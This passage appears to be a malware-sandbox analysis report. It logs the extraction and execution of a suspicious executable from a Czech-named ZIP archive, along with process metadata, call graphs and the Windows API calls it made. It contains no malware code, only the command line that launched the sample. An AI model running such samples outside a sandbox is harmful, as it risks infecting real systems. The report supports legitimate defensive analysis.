                                                          Target ID:13
                                                          Start time:14:50:02
                                                          Start date:26/03/2025
                                                          Path:C:\Windows\SysWOW64\unarchiver.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"
                                                          Imagebase:0xcf0000
                                                          File size:12'800 bytes
                                                          MD5 hash:16FF3CC6CC330A08EED70CBC1D35F5D2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:14:50:03
                                                          Start date:26/03/2025
                                                          Path:C:\Windows\SysWOW64\7za.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\fte0zu5k.zka" "C:\Users\user\Downloads\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.zip"
                                                          Imagebase:0xc0000
                                                          File size:289'792 bytes
                                                          MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:14:50:03
                                                          Start date:26/03/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68dae0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:14:50:07
                                                          Start date:26/03/2025
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe"
                                                          Imagebase:0x2a0000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:14:50:07
                                                          Start date:26/03/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68dae0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:14:50:07
                                                          Start date:26/03/2025
                                                          Path:C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\fte0zu5k.zka\Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exe
                                                          Imagebase:0x400000
                                                          File size:6'365'288 bytes
                                                          MD5 hash:4864A55CFF27F686023456A22371E790
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 3%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:14:50:45
                                                          Start date:26/03/2025
                                                          Path:C:\Windows\SysWOW64\unarchiver.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip"
                                                          Imagebase:0xb80000
                                                          File size:12'800 bytes
                                                          MD5 hash:16FF3CC6CC330A08EED70CBC1D35F5D2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:22
                                                          Start time:14:50:45
                                                          Start date:26/03/2025
                                                          Path:C:\Windows\SysWOW64\7za.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\5nsywy4n.y2a" "C:\Users\user\Downloads\Ozn men _o_zji t n _poru en _pr v_du evn ho_vlastnictv _.zip"
                                                          Imagebase:0xc0000
                                                          File size:289'792 bytes
                                                          MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:14:50:46
                                                          Start date:26/03/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68dae0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Execution Graph

                                                          Execution Coverage

                                                          Dynamic/Packed Code Coverage

                                                          Signature Coverage

                                                          Execution Coverage:22.3%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:5.5%
                                                          Total number of Nodes:73
                                                          Total number of Limit Nodes:4
                                                          Show Legend
                                                          Hide Nodes/Edges
                                                          execution_graph 1202 14fa78f 1204 14fa7c2 GetFileType 1202->1204 1205 14fa824 1204->1205 1206 14faa0b 1208 14faa46 CreateDirectoryW 1206->1208 1209 14faa93 1208->1209 1210 14faf8b 1211 14fafb2 FindClose 1210->1211 1213 14faff3 1211->1213 1128 14faa46 1130 14faa6c CreateDirectoryW 1128->1130 1131 14faa93 1130->1131 1214 14fad04 1215 14fad2a DuplicateHandle 1214->1215 1217 14fadaf 1215->1217 1143 14fa882 1145 14fa8b7 SetFilePointer 1143->1145 1146 14fa8e6 1145->1146 1182 14fa5dc 1184 14fa5fe CreateFileW 1182->1184 1185 14fa685 1184->1185 1151 14fa2da 1152 14fa32f 1151->1152 1153 14fa306 SetErrorMode 1151->1153 1152->1153 1154 14fa31b 1153->1154 1159 14fa716 1160 14fa742 CloseHandle 1159->1160 1161 14fa781 1159->1161 1162 14fa750 1160->1162 1161->1160 1163 14fb1d6 1164 14fb238 1163->1164 1165 14fb202 GetSystemInfo 1163->1165 1164->1165 1166 14fb210 1165->1166 1186 14fa6d4 1188 14fa716 CloseHandle 1186->1188 1189 14fa750 1188->1189 1190 14fa850 1191 14fa882 SetFilePointer 1190->1191 1193 14fa8e6 1191->1193 1218 14fa2ae 1221 14fa2b2 SetErrorMode 1218->1221 1220 14fa31b 1221->1220 1132 14fabe6 1133 14fac36 CreatePipe 1132->1133 1134 14fac3e 1133->1134 1135 14fa962 1136 14fa997 WriteFile 1135->1136 1138 14fa9c9 1136->1138 1222 14fa120 1223 14fa172 FindNextFileW 1222->1223 1225 14fa1ca 1223->1225 1147 14fa5fe 1148 14fa636 CreateFileW 1147->1148 1150 14fa685 1148->1150 1194 14fab76 1195 14fabe6 CreatePipe 1194->1195 1197 14fac3e 1195->1197 1226 14fb1b4 1227 14fb1d6 GetSystemInfo 1226->1227 1229 14fb210 1227->1229 1230 14fa933 1231 14fa962 WriteFile 1230->1231 1233 14fa9c9 1231->1233 1167 14fa172 1168 14fa1c2 FindNextFileW 1167->1168 1169 14fa1ca 1168->1169 1174 14fafb2 1175 14fafde FindClose 1174->1175 1177 14fb010 1174->1177 1176 14faff3 1175->1176 1177->1175 1198 14fa370 1199 14fa392 RegQueryValueExW 1198->1199 1201 14fa41b 1199->1201

                                                          Callgraph

                                                          Hide Legend
                                                          • Executed
                                                          • Not Executed
                                                          • Opacity -> Relevance
                                                          • Disassembly available
                                                          callgraph 0 Function_054B0748 1 Function_014FB246 2 Function_014FAA46 3 Function_014F2044 4 Function_014FB15D 5 Function_014FA45C 6 Function_014F2458 7 Function_054B0C50 8 Function_019B0880 9 Function_014FB052 10 Function_014FB351 11 Function_014FA850 12 Function_019B0784 13 Function_014FAC6C 14 Function_019B04BE 15 Function_014FA566 16 Function_019B07B2 17 Function_054B0C60 18 Function_014F2364 19 Function_014F2264 20 Function_019B07B6 21 Function_014FA962 22 Function_014FA462 23 Function_014F2579 24 Function_014FA078 25 Function_014FB276 26 Function_014FAB76 27 Function_014FA172 28 Function_014FA370 29 Function_014FB470 30 Function_014FA50F 31 Function_054B0E08 108 Function_054B0BA0 31->108 32 Function_019B05D8 33 Function_014FAA0B 34 Function_014F2006 35 Function_014FAB06 36 Function_014FA005 37 Function_014FAE05 38 Function_014FAD04 39 Function_019B05D0 40 Function_054B0006 41 Function_014FAF00 42 Function_014FB01E 43 Function_054B0E18 43->108 44 Function_019B05C8 45 Function_014FA716 46 Function_019B05C0 47 Function_014F2310 48 Function_014FA02E 49 Function_014FAD2A 50 Function_014FAF22 51 Function_014FB121 52 Function_014FA120 53 Function_054B0739 54 Function_014FA33D 55 Function_014F213C 56 Function_014FA23A 57 Function_054B0C3D 58 Function_019B05E0 59 Function_014FA933 60 Function_019B05E7 61 Function_014F2531 62 Function_014F2430 63 Function_019B0718 64 Function_054B02C0 64->60 77 Function_019B0606 64->77 97 Function_054B0799 64->97 65 Function_019B0710 66 Function_019B0810 67 Function_014FA7C2 68 Function_014FA5DC 69 Function_019B0808 70 Function_014FAADA 71 Function_014FA2DA 72 Function_019B000C 73 Function_014FB1D6 74 Function_054B0DD1 74->108 75 Function_014FA6D4 76 Function_019B0000 78 Function_014F20D0 79 Function_014FABE6 80 Function_054B0DE0 80->108 81 Function_014FAAE0 82 Function_014FA5FE 83 Function_019B082E 84 Function_014F23F4 85 Function_014FA1F4 86 Function_014F21F0 87 Function_014F2BF0 88 Function_014FA78F 89 Function_014FAC8E 90 Function_054B0B8F 91 Function_014FAF8B 92 Function_019B0753 93 Function_014FA486 94 Function_014FA882 95 Function_014FB39E 96 Function_014FB49E 97->7 97->17 97->60 97->77 97->90 98 Function_054B0C99 97->98 105 Function_054B0CA8 97->105 97->108 99 Function_019B0648 109 Function_019B066A 99->109 100 Function_014FA09A 101 Function_014F2098 102 Function_014F2194 103 Function_014FA392 104 Function_014FA2AE 106 Function_019B067F 107 Function_054B0DA2 107->108 110 Function_014F23BC 111 Function_019B026D 112 Function_054B05B1 113 Function_054B02B0 113->60 113->77 113->97 114 Function_014FB1B4 115 Function_014FAEB2 116 Function_014FAFB2

                                                          Executed Functions

                                                          APIs
                                                          • GetSystemInfo.KERNELBASE(?), ref: 014FB208
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem
                                                          • String ID:
                                                          • API String ID: 31276548-0
                                                          • Opcode ID: 2d3a9dce807c2b170d45d7d78956f1a82d2d7d02a5f037d22d16d15f81080340
                                                          • Instruction ID: bf1344dc043f150cdc9ca2ceb994568fee17db9dd20b61bd2f421983ca2f2779
                                                          • Opcode Fuzzy Hash: 2d3a9dce807c2b170d45d7d78956f1a82d2d7d02a5f037d22d16d15f81080340
                                                          • Instruction Fuzzy Hash: 2901A2758042409FDB10DF55D989766FBE4DF05620F08C4AFDE088F352D379A404CB62

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 14fb246-14fb2eb 5 14fb2ed-14fb2f5 DuplicateHandle 0->5 6 14fb343-14fb348 0->6 8 14fb2fb-14fb30d 5->8 6->5 9 14fb30f-14fb340 8->9 10 14fb34a-14fb34f 8->10 10->9
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,00000E24), ref: 014FB2F3
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 1a16c4198e213e561c92c65f700bbfedcd589748acc8ccfc9a4755ffe3264447
                                                          • Instruction ID: dcb81f75c27765d864c73cdf3cd7144b57f226f21382e80e8a0ece838f650f6f
                                                          • Opcode Fuzzy Hash: 1a16c4198e213e561c92c65f700bbfedcd589748acc8ccfc9a4755ffe3264447
                                                          • Instruction Fuzzy Hash: 0C31A172404344AFEB228B61DC45FA7BFBCEF06610F04889AF985CB162D324A9099B71

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 14 14fad04-14fad9f 19 14fadf7-14fadfc 14->19 20 14fada1-14fada9 DuplicateHandle 14->20 19->20 22 14fadaf-14fadc1 20->22 23 14fadfe-14fae03 22->23 24 14fadc3-14fadf4 22->24 23->24
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,00000E24), ref: 014FADA7
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: b3e942db9af2c7e35b6ef4d8f756e4614b398333016e87fc0a272c65951bd386
                                                          • Instruction ID: 2b01970c319ba63144fb1481d87936eb917841c69c105f8dd0560a6dee84a875
                                                          • Opcode Fuzzy Hash: b3e942db9af2c7e35b6ef4d8f756e4614b398333016e87fc0a272c65951bd386
                                                          • Instruction Fuzzy Hash: 1431CF72404344AFEB228B25DC45FA7BFBCEF05220F08889EF985CB162D324A509CB61

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 28 14fab76-14fac67 CreatePipe
                                                          APIs
                                                          • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 014FAC36
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CreatePipe
                                                          • String ID:
                                                          • API String ID: 2719314638-0
                                                          • Opcode ID: 9ddbc2c93cd29283645a0b15f6423ab0ff43c5cca81952be1166ce91ccd9edbc
                                                          • Instruction ID: 4829060384ab8b8bcb0977068fe305565fbf588823528423c37f1ffbbe6930fc
                                                          • Opcode Fuzzy Hash: 9ddbc2c93cd29283645a0b15f6423ab0ff43c5cca81952be1166ce91ccd9edbc
                                                          • Instruction Fuzzy Hash: A3316F7250E3C06FD3038B718C65A66BFB4AF47610F1A85CBD884DF1A3D269A919C762

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 33 14fa5dc-14fa656 37 14fa65b-14fa667 33->37 38 14fa658 33->38 39 14fa66c-14fa675 37->39 40 14fa669 37->40 38->37 41 14fa677-14fa69b CreateFileW 39->41 42 14fa6c6-14fa6cb 39->42 40->39 45 14fa6cd-14fa6d2 41->45 46 14fa69d-14fa6c3 41->46 42->41 45->46
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 014FA67D
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 11e1a9ef27077b1c7942be6a8baa457513408683f9893d45b305f0981f4bac69
                                                          • Instruction ID: 12ba3ff236b187bed60cbbfab1500ec33db8580e6ea1a467405bf999340e9e93
                                                          • Opcode Fuzzy Hash: 11e1a9ef27077b1c7942be6a8baa457513408683f9893d45b305f0981f4bac69
                                                          • Instruction Fuzzy Hash: A6317E71505340AFE722CF25DD45F66BFE8EF45220F08889EEA898B262D375E409CB71

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 49 14fa120-14fa1f3 FindNextFileW
                                                          APIs
                                                          • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 014FA1C2
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FileFindNext
                                                          • String ID:
                                                          • API String ID: 2029273394-0
                                                          • Opcode ID: 365d25e805ed3b1dd79296e85232605c97b4ffdbd411d2686f4ab74c1b6a6e8e
                                                          • Instruction ID: c638181e0f76109971fb7681997f04ee50ffb853f6245c941cc301682a4e570e
                                                          • Opcode Fuzzy Hash: 365d25e805ed3b1dd79296e85232605c97b4ffdbd411d2686f4ab74c1b6a6e8e
                                                          • Instruction Fuzzy Hash: 3B21A17140D3C06FD3128B258C55BA6BFB4EF47610F1985CBE8848F593D329A919D7A2

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 84 14fb276-14fb2eb 88 14fb2ed-14fb2f5 DuplicateHandle 84->88 89 14fb343-14fb348 84->89 91 14fb2fb-14fb30d 88->91 89->88 92 14fb30f-14fb340 91->92 93 14fb34a-14fb34f 91->93 93->92
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,00000E24), ref: 014FB2F3
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: de5aad2c89f3c4a71c8b2ba8357b122cff6a159781cf77cda29bde2ff8d0e9bb
                                                          • Instruction ID: 126f20ad92d6ddeee095a3147f1af2a93e37ec99cf97fac6c7a5a4011e884c32
                                                          • Opcode Fuzzy Hash: de5aad2c89f3c4a71c8b2ba8357b122cff6a159781cf77cda29bde2ff8d0e9bb
                                                          • Instruction Fuzzy Hash: 3B21C472500204AFEB219F65DC45F6BBBECEF04714F04896EFA458B251D774E5448BA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 54 14fa370-14fa3cf 57 14fa3d4-14fa3dd 54->57 58 14fa3d1 54->58 59 14fa3df 57->59 60 14fa3e2-14fa3e8 57->60 58->57 59->60 61 14fa3ed-14fa404 60->61 62 14fa3ea 60->62 64 14fa43b-14fa440 61->64 65 14fa406-14fa419 RegQueryValueExW 61->65 62->61 64->65 66 14fa41b-14fa438 65->66 67 14fa442-14fa447 65->67 67->66
                                                          APIs
                                                          • RegQueryValueExW.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA40C
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID:
                                                          • API String ID: 3660427363-0
                                                          • Opcode ID: 645ccacd71bcec2d5a8213100b40da8e838a1659270b790ad2572484137355b3
                                                          • Instruction ID: d5e7e3969816378492426eab9873695ffe96f71ff8cf47905eceb2a8bed66aca
                                                          • Opcode Fuzzy Hash: 645ccacd71bcec2d5a8213100b40da8e838a1659270b790ad2572484137355b3
                                                          • Instruction Fuzzy Hash: AD216D76504744AFE721CF15DC84FA7BBF8EF05610F18849AEA89CB262D364E948CB61

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 71 14fad2a-14fad9f 75 14fadf7-14fadfc 71->75 76 14fada1-14fada9 DuplicateHandle 71->76 75->76 78 14fadaf-14fadc1 76->78 79 14fadfe-14fae03 78->79 80 14fadc3-14fadf4 78->80 79->80
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,00000E24), ref: 014FADA7
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 873fe6b18c16468d119e339c776d4371e3500f37199045a6d29ded3b71bd8921
                                                          • Instruction ID: e4a5db62b684b0ca66f8658e9b3be7e192e608336825c13585aec6aba9400f7d
                                                          • Opcode Fuzzy Hash: 873fe6b18c16468d119e339c776d4371e3500f37199045a6d29ded3b71bd8921
                                                          • Instruction Fuzzy Hash: D121F172400204AFEB218F65DD45FABFBECEF04324F04886EFA458B252D734E5498BA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 97 14fa850-14fa8d6 101 14fa91a-14fa91f 97->101 102 14fa8d8-14fa8f8 SetFilePointer 97->102 101->102 105 14fa8fa-14fa917 102->105 106 14fa921-14fa926 102->106 106->105
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA8DE
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 8d9b4c2e32e2cdc7ccb0303d78c1d12e03fe49385aac65a261b5a317e2204f81
                                                          • Instruction ID: 0f941c27b738810eb103b1076928b6e09affa4861f15ed28054d5b2acf79ab42
                                                          • Opcode Fuzzy Hash: 8d9b4c2e32e2cdc7ccb0303d78c1d12e03fe49385aac65a261b5a317e2204f81
                                                          • Instruction Fuzzy Hash: 4821A471409380AFE7228F25DC45FA6BFB8EF46714F0988EBF9848B153D265A909C771

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 109 14fa933-14fa9b9 113 14fa9fd-14faa02 109->113 114 14fa9bb-14fa9db WriteFile 109->114 113->114 117 14fa9dd-14fa9fa 114->117 118 14faa04-14faa09 114->118 118->117
                                                          APIs
                                                          • WriteFile.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA9C1
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 0cf121e6e23903a34db434327e74b977086d0deb051ead5af3bfecdbed17fdf3
                                                          • Instruction ID: 59474c4ccbb89022c386fbdc67e7d6f121187d9f6a802dc35ff352cc9b6b125d
                                                          • Opcode Fuzzy Hash: 0cf121e6e23903a34db434327e74b977086d0deb051ead5af3bfecdbed17fdf3
                                                          • Instruction Fuzzy Hash: 1321A371409380AFDB22CF25DC45F97BFB8EF06614F08849AE9858B153C375A548CBB1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 121 14fa5fe-14fa656 124 14fa65b-14fa667 121->124 125 14fa658 121->125 126 14fa66c-14fa675 124->126 127 14fa669 124->127 125->124 128 14fa677-14fa67f CreateFileW 126->128 129 14fa6c6-14fa6cb 126->129 127->126 131 14fa685-14fa69b 128->131 129->128 132 14fa6cd-14fa6d2 131->132 133 14fa69d-14fa6c3 131->133 132->133
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 014FA67D
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 12cbb81dd41992460af8946288daa7015289766b688c4115c7c746d82b2eae3f
                                                          • Instruction ID: 6112267edc146888079af48bb27cc11fc644a5f256254edbb9778fd0f984b5d8
                                                          • Opcode Fuzzy Hash: 12cbb81dd41992460af8946288daa7015289766b688c4115c7c746d82b2eae3f
                                                          • Instruction Fuzzy Hash: D7219071500200AFEB21DF65DD45F67FBE8EF08610F18886EEA898B362D375E408CB61

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 136 14fa78f-14fa80d 140 14fa80f-14fa822 GetFileType 136->140 141 14fa842-14fa847 136->141 142 14fa849-14fa84e 140->142 143 14fa824-14fa841 140->143 141->140 142->143
                                                          APIs
                                                          • GetFileType.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA815
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID:
                                                          • API String ID: 3081899298-0
                                                          • Opcode ID: 31356526e827c8acb6beb34c93625a315badda51bd32094dd19a4421f4ca8e37
                                                          • Instruction ID: ae1fbc0e32c60d900ed506cd3dea3b01330b888629df4dcf123bd510dea1a04b
                                                          • Opcode Fuzzy Hash: 31356526e827c8acb6beb34c93625a315badda51bd32094dd19a4421f4ca8e37
                                                          • Instruction Fuzzy Hash: DF21D5B54093806FE7128B21DC45BA3BFB8DF47714F0880DBF9858B293D268A909C775

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 147 14faa0b-14faa6a 149 14faa6f-14faa75 147->149 150 14faa6c 147->150 151 14faa7a-14faa83 149->151 152 14faa77 149->152 150->149 153 14faa85-14faaa5 CreateDirectoryW 151->153 154 14faac4-14faac9 151->154 152->151 157 14faacb-14faad0 153->157 158 14faaa7-14faac3 153->158 154->153 157->158
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?), ref: 014FAA8B
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory
                                                          • String ID:
                                                          • API String ID: 4241100979-0
                                                          • Opcode ID: 877eb27e762c9bc66eed07c93b89191d1301e5359375b3b3372779673a16a613
                                                          • Instruction ID: cf0a8be843807172f3a5302614af1e3e5c2c322c2e4e23f6033d91025d456449
                                                          • Opcode Fuzzy Hash: 877eb27e762c9bc66eed07c93b89191d1301e5359375b3b3372779673a16a613
                                                          • Instruction Fuzzy Hash: 5021A4715083805FD712CB29DC55B93BFE8AF06314F0D84EAD984CB253D224D909C761

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 160 14fa392-14fa3cf 162 14fa3d4-14fa3dd 160->162 163 14fa3d1 160->163 164 14fa3df 162->164 165 14fa3e2-14fa3e8 162->165 163->162 164->165 166 14fa3ed-14fa404 165->166 167 14fa3ea 165->167 169 14fa43b-14fa440 166->169 170 14fa406-14fa419 RegQueryValueExW 166->170 167->166 169->170 171 14fa41b-14fa438 170->171 172 14fa442-14fa447 170->172 172->171
                                                          APIs
                                                          • RegQueryValueExW.KERNELBASE(?,00000E24,96B40A86,00000000,00000000,00000000,00000000), ref: 014FA40C
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1701983488.00000000014FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FA000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID:
                                                          • API String ID: 3660427363-0
                                                          • Opcode ID: 2e43fd11792e6f2174f08fc6e1bbbaf0e2b53251b02813ec38761db6bc86a9e7
